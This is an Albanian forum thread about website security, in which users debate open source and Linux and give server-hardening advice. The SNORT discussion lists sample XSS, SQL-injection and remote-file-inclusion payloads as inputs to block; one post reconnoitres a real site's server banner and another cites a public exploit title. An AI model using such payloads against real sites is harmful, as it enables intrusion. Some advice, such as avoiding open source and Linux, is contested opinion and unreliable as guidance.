×
Hyrja
Profili

Disa keshilla per sigurine e webfaqeve

Disa keshilla per sigurine e webfaqeve

· 8 · 1942

  • Postime: 61
Ervis Tusha
ne: 28-11-2010, 17:45:22
Ardit, me aftesite e tua ne fushen e sigurise, do kishte qene shume me vlere sikur te hapje nje blog shqip per te raportuar mbi problemet e sigurise ne faqet shqiptare ne vecanti, apo dhe per rreziqe te tjera ne internet ne pergjithesi. Dicka e tille i mungon shume rrjetit shqiptar.

Nuk ja vlen kam ndimuar dhe kam pare shume persona te cialt kane staf programimi qe faqet e tyre zyrtare kan probleme

@albanianwizard te besh pentest te vertet duhet min te dish 2 gjuhe programimi C/C++ dhe Python dhe nuk mund ta besh vetem pa mbeshtetjen e dikujt qe ka njohuri

Une jam me shume tek Vulnerability Assessment dhe tek "Script Kiddie" pasi nuk kam ndermend ta kthej ne prefesionin e jetes  
dmth merrem me Web vulnerabilities  

sa per informacion te tjerve te rrine te qete jan te paket ato qe mund te bejne nje pentest te veretet ose qe mund te futen ne server brenda pak sekondave

Cfare do ju keshilloja une ? ...
0. Duhet te mendoni se nqs nje produkt nuk eshte i sigurte ai nuk ja vlen per asgje
0. rekrutoni dike qe ka njohurite e duhura ne fushen e sigurise
1. larg open sources
2. larg programeve dhe scripteve te pa njohur
3. larg produkteve falas per "produkte" serioze
4. larg linux server&desktop
5. update update (por dhe jo shume update shtohet mundesia e shtimit te nje bugs te ri )
6. ...

  • Postime: 26634
  • Gjinia: Mashkull
M A X
#1 ne: 28-11-2010, 18:00:24
Mepare keto postime ishin ne kete teme: http://www.zeriyt.com/webmasterizimi-i-kalamajve-shqiptar-t68131.0.html

Etusha, pse nuk e hap teme me vete kete me keshillat qe dhe sefundi, sepse besoj se do te kete interes. Dhe une do te beja disa pyetje per sqarim. Por jo ketu sepse s'eshte tema e duhur.

  • Postime: 26634
  • Gjinia: Mashkull
M A X
#2 ne: 28-11-2010, 18:29:26
Per dy pika nga ato keshillat e tua do doja pak me shume sqarime.

Citim
1. larg open sources

Pse duhet qendruar larg kur sot shumica e faqeve ne internet eshte ndertuar me skripte/cms open source?

Citim
4. larg linux server&desktop

Do te thuash qe eshte me mire te perdoresh server Windows? Pastaj Linux eshte ne absolut sistemi me i perdorur kur vjen puna per webserver. Ku qendron problemi me Linux ne kete rast?

  • Postime: 61
Ervis Tusha
#3 ne: 28-11-2010, 20:02:54
1.larg open sources
dikush qe ka njohur rreth gjuhes me te cilen eshte krijua produkti shume kollaj mund te lexoj kodin dhe te gjej bugs te ndryshem

Open sources eshte e njejte sikur ti japesh "hajdutit" harten e bankes dhe detaje mbi sistemin e alarmit
une kam ndihmuar disa open sources per nje kohe te shkurter psh kunena eshte nje component per forum ne Joomla aty kam gjetur disa bugs duke lexuar kodin

Do te kundervihen fans e open sources ja fale opensource ti e gjete dhe ata e riparuan kete bugs...

Por le te supozojme sikur te zbulohet nje critical bug i cili prek versionet nga 0-10?
Ok, do te riparohet ne versionin 11 por cfare do te ndodh me gjithe ato perdorues te cilet kan keto versione

ndersa me closed sources veshtirsia rritet shumefish  thjeshte mund te hamendsojme cfare procesesh kryen pordukti i cili duam te testojme

4. larg linux server&desktop

Po e nis me piken 3
3. larg produkteve falas per "produkte" serioze

Produketet flas nuk mbajne pergjesi se cfare demesh mund te shaktohen nga perdorimi ose difekte qe mund te kete ai produkt

90% te produkteve supporti i tyre le per te deshiruar


pse larg linux sepse linux prek pikat 1 dhe 3
nje pjese e madhe e linux  eshte open sources  dhe dikush qe ka njohuri te mira mund te zbuloj dobesi dhe mos ti raportoj ato

gjithashtu askush nuk mban pergjesi se cfare mund te ndodh gjate perdorimit te linux

do te thone fans e linux po google facebook etj etj perdorin linux
une personalisht nuk besoj te jete 100% i vertet ato mund te perdorin Linux por shume shume te modifikuar per nevojat e tyre
ne nje postim te blog zyrtar i google kam lexuar qe ato mund te kishin mbi 10 OS per pune te ndryshme nje OS i takonte vetem nje pune

imagjinoni sikur google te perdorte ProFTPD  1.3.3a # Exploit Title: ProFTPD IAC Remote Root Exploit
 http://www.exploit-db.com/exploits/15449/ cfare do te ndodhte ...

Shenim: Une nuk jam kunder open sources apo produkteve falas por varet nga apps

  • Postime: 26634
  • Gjinia: Mashkull
M A X
#4 ne: 02-12-2010, 13:07:23
Ervis, keshillat e tua jane me siguri me shume vlere. Vetem se per nje webmaster te thjeshte keto jane te veshtira per t'u ndjekur, sepse nuk ekzistojne resurset e duhura.
Ndersa, nese nje projekt serioz merr rruge, i nisur nga nje kompani me buxhet te madh, atehere me siguri keto qe permend ti duhet te ndiqen, sepse mundesite jane dhe kur shpenzon shume rrezikon dhe shume.

  • Postime: 43
albanianwizard
#5 ne: 09-12-2010, 20:18:10
Pershendetje Ervis,

pershendetje per temen , deri tani te pakten po jepen mendime serioze.

Me informacionin qe kam ne dispozicion nuk jam dakort ne disa pika..
Persa me perket mua, kur flitet per siguri nuk jam ekspert siç eshte thene ne disa postime, dhe nuk e di se nga ka dale ajo info. Profesioni qe kam i afrohet por nuk eshte saktesisht ai, por perseri jam marr me sigurin dhe nuk kam pasur asnjehere 1 layered approach.


Duke u bazuar ne ate qe the, merresh me shume me web application security, dhe ketu po perfshij  injection flaws, scripting vulnerabilities e deri tek session hijacking dhe ja po e zgjerojm edhe me shume dhe po fusim worme ne javascript per deportime ne intranete.
E gjithe kjo metodike eshte shume e limituar ne akses, dhe shume lokale, nuk te jep fuqi "per me shume" dhe nese do "ta zgjerosh" per me shume fuqi, do te detyrohesh te dalesh nga lloi i sigurise.
Psh, po e zem se ke nje shell skript diku, ja po e zeme ke dhe safe mode bypass, por nje kompani hosting sado e vogel me nje webmaster te zotin do bente qe teshkaterrohej vetem 1 faqe, ja 10 por jo me shume..
Pra nese do per "me shume" do kalosh tek instalimi i ndonje kompilatori "on fly" , ndonje local root exploit,  instalimi i ndonje backdori,/rootkiti, dhe nuk kemi te bejm me me skripte por me kod.

Mbasi e kemi thene kete, dhe jam i sigurt qe i di keto qe po shkruaj dhe ke siguri mbi burimin e informacionit (eksperienca) dalim ne perfundimin se nje qe di dhe ben punen (penetration testing / auditing) kur e sheh punen e sheh ne forme multi-layered, pra nuk analizon vetem nje pjese te kodit (php, asp, etj) qe egzekutohet nga nje proçes (apache, ose tjeter) por shikon teresine e proçeseve, dhe teresine e sistemeve.

Shume gabojn kur mendojn se "uuu, ky sistemi ka SNORT, apo qenka firewalli perpara, apo... ; Si i behet , ka DMZ ne mes, si te kaloj ne GREEN" pasi nje afrim si ai qe u permend me siper do e shihte edhe snortin, firewallet, sistemet e sigurise etj si mundesi per te deportuar.
 hmmmmm:
Pra, e perseris , vete sistemet mbrojtese mund te shfrytezohen shume mire per sulm.

Kjo sepse:

1)Sistemet mbrojtese jane "prej kodi" dhe jo prej hekuri.
2)Ky kod eshte programuar nga nje njeri.
3)Shumica e kodeve nuk kalojn fazen penetration testing per shkak te kohes, fondeve etj.
4)Perderisa e ka programuar nje njeri atehere me siguri ka vulnerabilitet.
5)Aq e vertete eshte kjo sa qe ka ligje (KLOC) qe percaktojn sasine e vulnerabiliteteve qe gjenden ne 10Kloc kod psh.

I permenda te gjitha keto ne menyre qe te kuptohet ajo qe po shkruaj me poshte;

OpenSource nuk eshte aspak me i pasigurt se sa kodi i mbyllur apo privat perkundrazi jam i tjeter mendimi.
Kodi privat edhe pse eshte i mbyllur nuk do te thote se "eshte vertet i mbyllur" te pakten per ata qe dine te perdorin IDA pro debugger.
Kodi privat ka shume here me shume vulnerabilitete se ai publiku sepse sulmohet nga shume (qe nuk raportojn vulnerabilitete) dhe mbrohet nga pak (ata qe kane liçencen) dhe kjo ka sjelle ato ritme sulmi deri sa njohim viruset sot.
OpenSource , pikerisht se eshte kod i hapur edhe ky eshte nga njeriu dhe ka gabime, por ne ndryshim nga ai i mbylluri ka shume qe e sulmojn, dhe ne te njejten kohe prap shume qe perpiqen per rregullime.
Keshtu qe per mua, me shume njerez qe punojn per rregullimin e diçkaje do te thote relativisht me e sigurt se tjetra.
Nderkohe, me pak persona qe punojn per diçka, do te thote me pak e rregulluar + qe zakonisht exploitet per keto lloj vulnerabilitetesh qendrojn private, pa permendur ketu vrimat qe as tentohen ndonjehere te rregullohen.
(vulnerabilitet i windows 98 i kernel32.dll gjendet edhe sot tek windows7, yep, kernel i ri, bug i vjeter ;) )
Kjo eshte aq e vertete, saqe e dime mire te dy se sa viruse me sulme (exploiting) automatizuara ka ne qarkullim per sisteme me kod te mbyllur si windows pikerisht per shkak te pasigurise.

Persa i perket "pasigurise" se desktopeve/workstation etj Linux/Unix, them perseri dakort , sepse ç'do kod ka vulnerabilitete (ky eshte ligj) por perseri per tju kthyer mendimit te dhene me siper po sjell nje histori te vogel..
Perpara 2 vitesh po bisedoja me nje mikun tim i cili eshte Instruktor GLS (RedHat) dhe nga muabeti jboss dolem tek siguria, dhe ai me foli per nje projekt qe po zhvillonin per .mil tek sistemet e tyre per filesistemin e linuxit ku perveç lejeve te fajleve (siç besoj se e di rwx, ownership etj) u kishin shtuar edhe nje çertifikat qe i bente failet te lexushme vetem nga 1 user.

Duke thene kete, them se specialistet me te medhenj te sigurise perdorin Unix/Linux (patched normal), perfshir  ketu shoqerite investigative private, shoqerite shtetrore te cyber crime si dhe inteligjenca artificiale.

Duke u nisur nga supozimi qe te gjitha keto institucione, kane arsye te forta te cilat i shtyjn te perdorin open-source , kjo me çon te mendoj se eshte "more tested" and more widley tried to hack" se sa kodi i mbyllur.

R.Stallman : "Kompiuterin e lidh ne rrjet vetem ne mengjes per te shkarkuar emailin dhe ne darke per te derguar pergjigjet"

Nuk besoj se Torvalds + Torvalds + Torvalds * Bill Gates jane sa gjysma e ketij, dhe duke bere kete veprim nje njeri me njohuri te tilla besoj se ka arsyet e veta, qe çojn serisht tek ligji qe, nese diçka eshte koduar nga njeriu ka gjithmone vulnerabilitete dhe siguria eshte gjithmon relative.

Se fundmi, nese perdor windows, besoj se e di qe it's shipped out with NSA backdoor?
http://news.bbc.co.uk/2/hi/sci/tech/437967.stm

Per tju kthyer temes, keshilla ime per sigurimin e faqeve eshte:

"Edukimi i webmasterave me format e penetrimit dhe hackimit ne faqet e tyre, studimi real i kodit, nese nuk keni kohe per keto (si puna ime psh, se sdo rri te lexoj komplet source kodin e wordpresit) atehere te pakten aplikoni nje sistem mbrojtes apo bllokues per sulmet e njohura dhe ruhuni te pakten nga exploitet publike (pra kur e shihni qe ka, aplikoni patchin).

U habita kur lexova per hackimin e webmaster.al, une njehere kam bere nje 1/99 pen-test, dhe pashe qe kishin te instaluar, snort, psad, iptables , sisteme sigurie etj (e mbylla me aq) [sqarim, normalisht fola per kete me olgin a, algertin nuk me kujtohet] por nuk do ma kishte marre mendja qe te ishte hackuar me nje rfi te faq.php qe ka ketu e nuk mbahet mend qe eshte publik.

  • Postime: 26634
  • Gjinia: Mashkull
M A X
#6 ne: 09-12-2010, 23:33:30
Ardit faleminderit per shpjegimet me shume vlere qe ke dhene.
Eshte e rendesishme qe diskutohet dhe ceshtja e sigurise sepse deri tani i eshte dhene pak rendesi, edhe se ndoshta eshte nje nga gjerat me me rendesi.

  • Postime: 43
albanianwizard
#7 ne: 10-12-2010, 18:56:56
Ardit faleminderit per shpjegimet me shume vlere qe ke dhene.
Eshte e rendesishme qe diskutohet dhe ceshtja e sigurise sepse deri tani i eshte dhene pak rendesi, edhe se ndoshta eshte nje nga gjerat me me rendesi.

Eshte e vertete, dhe diçka qe eshte per te ardhur keq eshte se edhe ato forume "qe merren me siguri" apo qe tentojn ta studjojn jane shume larg, dhe kjo eshte ajo qe me shqeteson me shume pasi nuk shikohet si diçka nga e cila mund te perfitosh apo edhe profesion por shihet si hobby, dhe menyre e mire per tu "pasur frike" apo per te gufuar velat e femijeve qe jane gati per lundrim duke perdorur dork ne google...

Per tju kthyer perseri temes,

Doja te fokusohesha pak ne disa komponent sigurie qe duhet te modifikoj ç'do webmaster.

komponentet e pergjithshem jane:

 1) Webserver
 2) PHP
 3) Mysql

Qe te tre keto komponent nuk duhet asnjeher te instalohen direkt nga distribucioni, psh pacman -S php, apo apt-get install apache2 e keshtu me  radhe, une gjithmon rekomandoj instalimin from scratch dhe ja arsyet:

1) Ke mundesi ti modifikosh dhe te aplikosh patche, dhe mund te shtosh komponent sigurie dhe te heqesh komponent qe perfaqesojn rrezik, module etj.

Psh, persa i perket PHP,s rekomandoj suhosin patch, si dhe çaktivizimit te shume funksioneve qe nuk duhen si exec() e keshtu me radhe...
Pra secili nga keto komponent, duhet te shkarkohet si source kod, pastaj ti aplikohen patche, pastaj te modifikohen (psh, apache me modifikimet e duhura mund te behet te duket nje ngix, apo nje Microsoft IIS, perfshire ketu faqet 404, 500,etj dhe fshehja e versioneve ne kete rast apo kamuflimi i softwarit eshte diçka shume pozitive, psh:

Kodi: [Zgjidh]
arditi@blackbox:~$ curl --head [url=http://www.top-channel.tv]www.top-channel.tv[/url]
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Dec 2010 17:42:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.10
Content-type: text/html
mora me thjesht 3 packeta (syn-ack-synack) serverin / versionin, php-n / versionin, pra per mua gjera qe mund te evitohen nese kompilohet nga source kodi, aplikohen patche (shumica e tyre bejn pune te mire kunder vulnerabiliteteve te zakonshme rfi, sql injection , lfi etj..) si dhe kamuflimin i cili te themi qe eshte shuuuume i mire , dhe eviton nje seri te mire exploitesh nga lamera qe provojn exploite te gatshme.

Psh te imagjinojm dike qe ka nje exploit per Microsoft IIS (edhe buffer overflow) dhe e leshon si i çmendur kunder serverit nderkohe qe ne realitet edhe pse fingerprinti thote se eshte Microsoft IIS kemi te bejm me nje apache. hmmmmm:

Persa i perket aplikacioneve te tjera, nje firewall i mire i testuar eshte gjithmon i duhur, perveç kesaj pastaj varet nga skripti qe ke se si mund te aplikosh metodat mbrojtese.

Nje mbrojtje e pergjithshme do te ishte nje SNORT i rregulluar mire i cili duke qene ne shtresen 7 te rrjetit (referr to Osi layers) mund te analizoj dhe te bllokoj kerkesa te tipit:

<script> alert ('xss');</script>
ose
post.php?id='union select all from users......
ose
file.php=http://asldjasdhj.com/evilscriptrsomething.txt?

e keshtu me radhe.
kjo eshte ajo qe preferoj kur kemi te bejm me menaxhime serverash, ndersa lind pyetja po kur nuk kam server te dedikuar???

Eh, ketu te gjith duhet te kerkojn aplikacionin e tyre te preferuar ne baze te softwarit qe perdorin, psh ctracker apo sisteme te tjera ne php qe kontrollojn dhe merren me "sanitising" te inputit.

Direktorit e adminit, sugjerohet qe gjithmon te sigurohen me .htaccess (pra kerkerse per login/password nga serveri) si dhe passwordet nuk duhet te dergohen asnjehere in blank.

Gjithsesi shumica e deportimeve qe behen sot, behen per shkak te budallukut te adminave qe egzekutojn software (keylogera) vend e pa vend.., u vidhen cookiet apo passwordet e shpetuara te firefoxit e keshtu me radhe...
Tema sigurisht eshte shume e gjate, dhe kam lene shume pa permendur,

Ervisi mund te shtojn normalisht shume.

Shpresoj qe keto info te mund ti sherbejn dikujt,

Me respekt,
Arditi.